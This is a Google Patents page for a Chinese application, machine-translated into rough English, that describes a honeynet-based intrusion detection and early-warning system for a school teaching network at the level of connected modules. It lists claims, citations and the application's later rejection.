[go: up one dir, main page]

CN108366088A - A kind of information security early warning system for Instructing network - Google Patents

A kind of information security early warning system for Instructing network Download PDF

Info

Publication number
CN108366088A
CN108366088A CN201711466279.2A CN201711466279A CN108366088A CN 108366088 A CN108366088 A CN 108366088A CN 201711466279 A CN201711466279 A CN 201711466279A CN 108366088 A CN108366088 A CN 108366088A
Authority
CN
China
Prior art keywords
module
data
signal end
honey
early warning
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN201711466279.2A
Other languages
Chinese (zh)
Inventor
李传芹
曹端阳
唐瑭
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Guangzhou Hua Xia Technical College
Original Assignee
Guangzhou Hua Xia Technical College
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Guangzhou Hua Xia Technical College filed Critical Guangzhou Hua Xia Technical College
Priority to CN201711466279.2A priority Critical patent/CN108366088A/en
Publication of CN108366088A publication Critical patent/CN108366088A/en
Pending legal-status Critical Current

Links

Classifications

    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L67/00Network arrangements or protocols for supporting network services or applications
    • H04L67/01Protocols
    • H04L67/12Protocols specially adapted for proprietary or special-purpose networking environments, e.g. medical networks, sensor networks, networks in vehicles or remote metering networks
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1441Countermeasures against malicious traffic

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computing Systems (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Computer Hardware Design (AREA)
  • General Engineering & Computer Science (AREA)
  • Health & Medical Sciences (AREA)
  • General Health & Medical Sciences (AREA)
  • Medical Informatics (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)

Abstract

The invention discloses a kind of information security early warning systems for Instructing network,Including sweet net host,Data analytics server and monitor terminal,The signal end of the honey net host is connected with wireless router,The signal end of the wireless router is connected with data analytics server,The signal end of the wireless router is also associated with monitor terminal,The honey net host includes sweet net gateway and honey jar virtual group,The interaction port of the honey net gateway is connected with honey jar virtual group,The signal end of the honey net host is also associated with data analysis system,The data terminal of the honey net host is also associated with Database Systems,The control terminal of the monitor terminal is connected with monitoring management system,Whole system uses dynamic defense technique,It can realize that the real time information of network is monitored,Capture and analysis,The attack of capture and monitoring potential hacker,To grasp the motivation and inbreak method strategy of hacker,Also it can realize and a point folding evidence obtaining is carried out to network intrusions.

Description

A kind of information security early warning system for Instructing network
Technical field
The present invention relates to Instructing network information security field, specially a kind of information for Instructing network is pacified Full early warning system.
Background technology
School is the place imparted knowledge and educated people, and Instructing network plays very heavy wherein as a kind of means of informationization The effect wanted.However security issues become increasingly urgent for Instructing network, oneself threatens the head of school information technical education through becoming Want problem.As the test that internet is subjected to, unhealthy information, illegal invasion and various other insecurity are got over it This block pure land of school is corroded come bigger harm.
For example, application No. is 201510727383.7, patent name is that a kind of linkage of power information system information security is pre- Alert system invention patent:
It can real-time monitoring equipment state and security incident linkage early warning, and by collection analysis treated index with The result presentation of event is supervised and is acquired for equipment long-distance video on large-size screen monitors, carries out information security linkage early warning, and guarantee is set Standby and network safety.
But the information security early warning system of existing Instructing network has the following defects:
(1) active Warning System is finally for information network security service, and the reliable and stable of information network is The important leverage of Instructing network safe operation, but current information network presence is unable to the unknown security risk of Initiative Defense Safety problem;
(2) structure that existing Instructing network designs in terms of Prevention-Security is complex, and automatic defense Can be poor, under the premise of no any sign, it can not determine the position of weak link and loophole.
Invention content
In order to overcome the shortcomings of prior art, it is pre- that the present invention provides a kind of information security for Instructing network Alert system, can effectively solve the problem that the problem of background technology proposes.
The technical solution adopted by the present invention to solve the technical problems is:
A kind of information security early warning system for Instructing network, including sweet net host, data analytics server And monitor terminal, the signal end of the honey net host are connected with wireless router, the signal end and number of the wireless router It is connected according to Analysis server, the signal end of the wireless router is also associated with monitor terminal, and the honey net host includes The interaction port of sweet net gateway and honey jar virtual group, the honey net gateway is connected with honey jar virtual group, the honey net host Signal end be also associated with data analysis system, the data terminal of the honey net host is also associated with Database Systems, the prison The control terminal of control terminal is connected with monitoring management system;
The data analysis system includes data capture module and intrusion detection module, the output of the data capture module End is connected with parsing module, and the signal end of the parsing module is connected with recombination conversion module, described to recombinate the defeated of conversion module Outlet is connected with intrusion detection module, and the output end of the intrusion detection module is connected separately with tracing module and early warning mould Block.
Further, the input terminal of the intrusion detection module is connected with rule process module and is connected.
Further, the rule process module includes rule match module and rule file detection module, the rule The output end of file detection module is connected with rule match module.
Further, monitoring management server and database service is also respectively connected in the signal end of the wireless router Device.
Further, the warning module includes master controller, and the signal end of the master controller is connected with threshold value setting The signal end of module, the threshold setting module is connected with program setting module, the signal end of the master controller and parsing Module is connected.
Further, the monitoring management system includes database DSS, database decision support system System includes data source modules and data warehouse module, and the signal end of the data source modules is connected with data capture module, institute The output end for stating data source modules is connected with intermediate data library module, and the output end of the data source modules passes through data flow and number It is connected according to warehouse module.
Further, the signal end of the intermediate data library module is connected with data increment update module, and the data increase The signal end of amount update module is connected with data warehouse module.
Further, the output end of the data warehouse module is connected with host analysis processing module, the host analysis The output end of processing module is connected with warning module.
Further, the signal end of the host analysis processing module is connected by data flow with intermediate data library module It connects.
Compared with prior art, the beneficial effects of the invention are as follows:
(1) information security early warning system of the invention is externally an open application system, is again internally modularization Closed system, it provides interface data for network real-time monitoring system, and convenient shared real time monitoring warning data fully carries The high safety protection level of teaching network system, but can virtual all kinds of production operation systems as much as possible, to realize full side The security protection of position;
(2) safety defense system of the invention uses dynamic defense technique, can realize the real time information of network into Row monitoring, capture and analysis, the attack of capture and monitoring potential hacker, to grasp the motivation and inbreak method strategy of hacker, Also it can realize and a point folding evidence obtaining is carried out to network intrusions.
Description of the drawings
Fig. 1 is the overall structure diagram of the present invention;
Fig. 2 is the data analysis system schematic diagram of the present invention;
Fig. 3 is the warning module schematic diagram of the present invention;
Fig. 4 is the monitoring management system schematic diagram of the present invention.
Figure label:
1- honey net hosts;2- data analytics servers;3- monitor terminals;4- monitoring management systems;5- data analyses system System;6- wireless routers;7- monitoring management servers;8- database servers;9- Database Systems;
101- honey net gateways;102- honey jar virtual groups;
401- host analysis processing modules;402- data warehouse modules;403- data source modules;404- data increments update Module;405- intermediate data library modules;406- database DSSs;
501- data capture modules;502- intrusion detection modules;503- parsing modules;504- recombinates conversion module;505- Tracing module;506- warning modules;507- rule process modules;508- rule match modules;509- rule file detection modules; 510- master controllers;511- threshold setting modules;512- program setting modules.
Specific implementation mode
Following will be combined with the drawings in the embodiments of the present invention, and technical solution in the embodiment of the present invention carries out clear, complete Site preparation describes, it is clear that described embodiments are only a part of the embodiments of the present invention, instead of all the embodiments.It is based on Embodiment in the present invention, it is obtained by those of ordinary skill in the art without making creative efforts every other Embodiment shall fall within the protection scope of the present invention.
As shown in Figures 1 to 4, the present invention provides a kind of information security early warning system for Instructing network, packets Sweet net host 1, data analytics server 2 and monitor terminal 3 are included, the signal end of the honey net host 1 is connected with no circuit By device 6, monitoring management server 7 and database server 8 is also respectively connected in the signal end of the wireless router 6, described The signal end of wireless router 6 is connected with data analytics server 2, and the signal end of the wireless router 6 is also associated with prison Control terminal 3, the system use dynamic defense technique, it can realize that the real time information of network is monitored, captures and analyzes, Capture and the attack of monitoring potential hacker can also be realized to network intrusions to grasp the motivation and inbreak method strategy of hacker Carry out a point folding evidence obtaining.Its operation principle is to utilize sweet net three zones:Data control, data capture and data analysis, are completed Real-time tracking to network risks and capture.
It further illustrates, the honey net host 1 includes sweet net gateway 101 and honey jar virtual group 102, the honey net The interaction port of gateway 101 is connected with honey jar virtual group 102, first, sweet network data control, honey is completed on the gateway of honey net Net gateway 101 to all data packets not restrictions for entering honey net, allow invader can easily intrude into sweet net, still Will to invader the springboard attack initiated outward using sweet net to carry out stringent control, the signal of the honey net host 1 End is also associated with data analysis system 5, and the data terminal of the honey net host 1 is also associated with Database Systems 9, the database System 9 is used for providing daily record and data storage service, for storing all information that HNS is captured.
The control terminal of the monitor terminal 3 is connected with monitoring management system 4, realizes that data are caught using monitoring management system 4 The demand obtained is completed by sweet net gateway 101 and the pre- honey jar virtual group 102 in honey jar host, together for entering The data packet of honey net is alerted according to rule, generates alarm log, while also being captured to original flow data packet, and raw At netflow flow datas.In each honey jar host, the Host behavior monitoring module that installation can be self to hide, to honey Various change situation inside tank host, such as network connection variation, process variation, registration table variation, file change progress Daily record is recorded and generated, sample file is captured, looks for transmission technology to be transmitted to sweet net gateway by hiding agreement, is finally sent to daily record Server.
The monitor terminal 3 is mainly used to logical between the active Warning System various components for carrying out information network Letter, the active Warning System administrator of information network pass through monitoring management from directorial area access system management region The web-based management interface of system carries out daily management and log analysis.
It further illustrating, the data analysis system 5 includes data capture module 501 and intrusion detection module 502, 501 Ethernet of the data capture module is working environment, and Ethernet transmission data by way of broadcast, network interface card can pass through Broadcast listening captures the data packet transmitted on Ethernet, provides basic data source for the realization of system, the data are caught The output end for obtaining module 501 is connected with parsing module 503, the bottom for passing through operating system by the data packet that parsing module 503 captures Layer driving is forwarded to system protocol stack, is decoded to the raw data packets of capture according to sequence from bottom to top in protocol stack Analysis, is the processing service of subsequent module, and the signal end of the parsing module 503 is connected with recombination conversion module 504, utilizes weight Group conversion module 504 handles the data packet that decoder module obtains, the output end of the recombination conversion module 504 and invasion Detection module 502 is connected, and it is a variety of to detect that the intrusion detection module 502 carries out rule match to the data packet being converted to Different intrusion behaviors, to find threat and the weakness of system, is responded and is tracked for early warning by constantly detecting network system Establish technical foundation.
The output end of the intrusion detection module 502 is connected separately with tracing module 505 and warning module 506, it is described enter The input terminal for invading detection module 502 is connected with rule process module 507 and is connected, and the rule process module 507 includes rule Matching module 508 and rule file detection module 509, output end and the rule match mould of the rule file detection module 509 Block 508 is connected, and first has to load rule file in rule match, rule file is the knowledge base of grid attack, library In have rule after could identify network intrusions behavior.Next resolution rules file is wanted, rule tree is established, into line discipline Match.
It further illustrates, warning module 506 is identified, record invasion and destructive visit by monitoring network data flow Operation is asked about, the network for finding network violation pattern and unauthorized accesses trial.When finding network violation pattern and unauthorized When network accesses trial, early warning system can react according to System Security Policy, by carrying out analyzing processing, system to data Determine alert levels, a variety of type of alarms are provided, classify to threat event, determine and threaten source, threat is counted, point Analysis etc..
It further illustrates, data analysis system 5 collects Various types of data and daily record, including network by log server Daily record and host log and original flow data packet and flow data, sample file etc., are associated analysis, in conjunction with into one The off-line analysis technology of step realizes the " data analysis " demands of honey net.
It further illustrates, the warning module 506 includes master controller 510, the signal end of the master controller 510 It is connected with threshold setting module 511, the signal end of the threshold setting module 511 is connected with program setting module 512, described The signal end of master controller 510 is connected with parsing module 503.
It further illustrates, it is to judge attacker invader that tracing module 505, which uses information tracing techniques its targets, Trace, the position in seat offence source, be inferred to attacker in a network walk routing etc..
It further illustrates, the monitoring management system 4 includes database DSS 406, the database DSS 406 includes data source modules 403 and data warehouse module 402, and the data source modules 403 are mainly used to adopt Collect the network data of wide area network, that is, the initial data received, the signal end and data capture module of the data source modules 403 501 are connected, and the output end of the data source modules 403 is connected with intermediate data library module 405, the intermediate data library module 405 are mainly responsible for and handle the text file of initial data, eliminate dirty data, are stored in intermediate database, are postorder module Normal data is provided.
It further illustrates, the output end of the data source modules 403 passes through data flow and 402 phase of data warehouse module The signal end of connection, the intermediate data library module 405 is connected with data increment update module 404, the data increment update The signal end of module 404 is connected with data warehouse module 402, and the output end of the data warehouse module 402 is connected with host The output end of analysis and processing module 401, the host analysis processing module 401 is connected with warning module 503, the host point The signal end of analysis processing module 401 is connected by data flow with intermediate data library module 405.
The data increment update module 404 realizes the incremental update to cube in data warehouse, network worm Data are real pair, but in safety pre-warning system, and periodic side is used to the data in the data warehouse of analysis Mediant is added in data in these files by method, i.e., in each cycle, newly-generated one group of structured text file, system According to library, and realize the incremental update of Data Warehouse, in the present system, the increment of data warehouse carries out more by the period of day Newly.
It further illustrates, host analysis processing module 401, which is realized, believes data warehouse cube information, dimension The display of breath, metric.
It is obvious to a person skilled in the art that invention is not limited to the details of the above exemplary embodiments, Er Qie In the case of without departing substantially from spirit or essential attributes of the invention, the present invention can be realized in other specific forms.Therefore, no matter From the point of view of which point, the present embodiments are to be considered as illustrative and not restrictive, and the scope of the present invention is by appended power Profit requires rather than above description limits, it is intended that all by what is fallen within the meaning and scope of the equivalent requirements of the claims Variation is included within the present invention.Any reference signs in the claims should not be construed as limiting the involved claims.

Claims (9)

1. a kind of information security early warning system for Instructing network, including sweet net host (1), data analytics server (2) and monitor terminal (3), it is characterised in that:The signal end of the honey net host (1) is connected with wireless router (6), described The signal end of wireless router (6) is connected with data analytics server (2), and the signal end of the wireless router (6) also connects It is connected to monitor terminal (3), the honey net host (1) includes sweet net gateway (101) and honey jar virtual group (102), the honey net The interaction port of gateway (101) is connected with honey jar virtual group (102), and the signal end of the honey net host (1) is also associated with The data terminal of data analysis system (5), the honey net host (1) is also associated with Database Systems (9), the monitor terminal (3) control terminal is connected with monitoring management system (4);
The data analysis system (5) includes data capture module (501) and intrusion detection module (502), the data capture The output end of module (501) is connected with parsing module (503), and the signal end of the parsing module (503) is connected with recombination conversion The output end of module (504), the recombination conversion module (504) is connected with intrusion detection module (502), the intrusion detection The output end of module (502) is connected separately with tracing module (505) and warning module (506).
2. a kind of information security early warning system for Instructing network according to claim 1, it is characterised in that:Institute The input terminal for stating intrusion detection module (502) is connected with rule process module (507) and is connected.
3. a kind of information security early warning system for Instructing network according to claim 2, it is characterised in that:Institute It includes rule match module (508) and rule file detection module (509), the rule file to state rule process module (507) The output end of detection module (509) is connected with rule match module (508).
4. a kind of information security early warning system for Instructing network according to claim 1, it is characterised in that:Institute Monitoring management server (7) and database server (8) is also respectively connected in the signal end for stating wireless router (6).
5. a kind of information security early warning system for Instructing network according to claim 1, it is characterised in that:Institute It includes master controller (510) to state warning module (506), and the signal end of the master controller (510) is connected with threshold setting module (511), the signal end of the threshold setting module (511) is connected with program setting module (512), the master controller (510) signal end is connected with parsing module (503).
6. a kind of information security early warning system for Instructing network according to claim 1, it is characterised in that:Institute It includes database DSS (406) to state monitoring management system (4), and the database DSS (406) includes Data source modules (403) and data warehouse module (402), the signal end and data capture module of the data source modules (403) (501) it is connected, the output end of the data source modules (403) is connected with intermediate data library module (405), the data source mould The output end of block (403) is connected by data flow with data warehouse module (402).
7. a kind of information security early warning system for Instructing network according to claim 6, it is characterised in that:Institute The signal end for stating intermediate data library module (405) is connected with data increment update module (404), the data increment update module (404) signal end is connected with data warehouse module (402).
8. a kind of information security early warning system for Instructing network according to claim 1, it is characterised in that:Institute The output end for stating data warehouse module (402) is connected with host analysis processing module (401), the host analysis processing module (401) output end is connected with warning module (503).
9. a kind of information security early warning system for Instructing network according to claim 1, it is characterised in that:Institute The signal end for stating host analysis processing module (401) is connected by data flow with intermediate data library module (405).
CN201711466279.2A 2017-12-28 2017-12-28 A kind of information security early warning system for Instructing network Pending CN108366088A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201711466279.2A CN108366088A (en) 2017-12-28 2017-12-28 A kind of information security early warning system for Instructing network

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN201711466279.2A CN108366088A (en) 2017-12-28 2017-12-28 A kind of information security early warning system for Instructing network

Publications (1)

Publication Number Publication Date
CN108366088A true CN108366088A (en) 2018-08-03

Family

ID=63010788

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201711466279.2A Pending CN108366088A (en) 2017-12-28 2017-12-28 A kind of information security early warning system for Instructing network

Country Status (1)

Country Link
CN (1) CN108366088A (en)

Cited By (2)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN109495470A (en) * 2018-11-12 2019-03-19 常熟理工学院 A kind of network information risk safe early warning method and server and system
CN111385308A (en) * 2020-03-19 2020-07-07 上海沪景信息科技有限公司 Security management method, device, equipment and computer readable storage medium

Citations (6)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101567887A (en) * 2008-12-25 2009-10-28 中国人民解放军总参谋部第五十四研究所 Vulnerability simulation overload honeypot method
CN102685147A (en) * 2012-05-31 2012-09-19 东南大学 Mobile communication honeypot capturing system and implementation method thereof
CN102790778A (en) * 2012-08-22 2012-11-21 常州大学 DDos (distributed denial of service) attack defensive system based on network trap
CN103561004A (en) * 2013-10-22 2014-02-05 西安交通大学 Cooperative type active defense system based on honey nets
US20140359708A1 (en) * 2013-06-01 2014-12-04 General Electric Company Honeyport active network security
CN105282170A (en) * 2015-11-04 2016-01-27 国网山东省电力公司电力科学研究院 Information security offense and defense drill competition system for power industry

Patent Citations (6)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101567887A (en) * 2008-12-25 2009-10-28 中国人民解放军总参谋部第五十四研究所 Vulnerability simulation overload honeypot method
CN102685147A (en) * 2012-05-31 2012-09-19 东南大学 Mobile communication honeypot capturing system and implementation method thereof
CN102790778A (en) * 2012-08-22 2012-11-21 常州大学 DDos (distributed denial of service) attack defensive system based on network trap
US20140359708A1 (en) * 2013-06-01 2014-12-04 General Electric Company Honeyport active network security
CN103561004A (en) * 2013-10-22 2014-02-05 西安交通大学 Cooperative type active defense system based on honey nets
CN105282170A (en) * 2015-11-04 2016-01-27 国网山东省电力公司电力科学研究院 Information security offense and defense drill competition system for power industry

Cited By (2)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN109495470A (en) * 2018-11-12 2019-03-19 常熟理工学院 A kind of network information risk safe early warning method and server and system
CN111385308A (en) * 2020-03-19 2020-07-07 上海沪景信息科技有限公司 Security management method, device, equipment and computer readable storage medium

Similar Documents

Publication Publication Date Title
US20190260793A1 (en) Multidimensional clustering analysis and visualizing that clustered analysis on a user interface
CN102594620B (en) Linkable distributed network intrusion detection method based on behavior description
CN112651006A (en) Power grid security situation perception platform framework
Singh et al. Collaborative ids framework for cloud
CN109587125B (en) Network security big data analysis method, system and related device
CN118353702B (en) Network information safety protection system
CN106656991A (en) Network threat detection system and detection method
CN104852927A (en) Safety comprehensive management system based on multi-source heterogeneous information
CN112511351B (en) Security situation prediction method and system based on MES identification data intercommunication system
CN112560029A (en) Website content monitoring and automatic response protection method based on intelligent analysis technology
CN113642023A (en) Data security detection model training method, data security detection device and equipment
CN113240116B (en) Wisdom fire prevention cloud system based on class brain platform
CN110855506A (en) Safety situation monitoring method and system
CN106130762A (en) A kind of network training comprehensive analysis method based on finite automaton
Pan et al. Anomaly based intrusion detection for building automation and control networks
CN106209902A (en) A kind of network safety system being applied to intellectual property operation platform and detection method
CN109150869A (en) A kind of exchanger information acquisition analysis system and method
CN115001934A (en) Industrial control safety risk analysis system and method
CN107547228A (en) A kind of safe operation management platform based on big data realizes framework
CN111698209A (en) Network abnormal flow detection method and device
CN108366088A (en) A kind of information security early warning system for Instructing network
CN110149303B (en) Party-school network security early warning method and early warning system
CN114374530A (en) IDS system and detection method based on real-time network traffic monitoring and analysis
CN111490976B (en) Dynamic baseline management and monitoring method for industrial control network
CN113132370A (en) Universal integrated safety pipe center system

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination
RJ01 Rejection of invention patent application after publication
RJ01 Rejection of invention patent application after publication

Application publication date: 20180803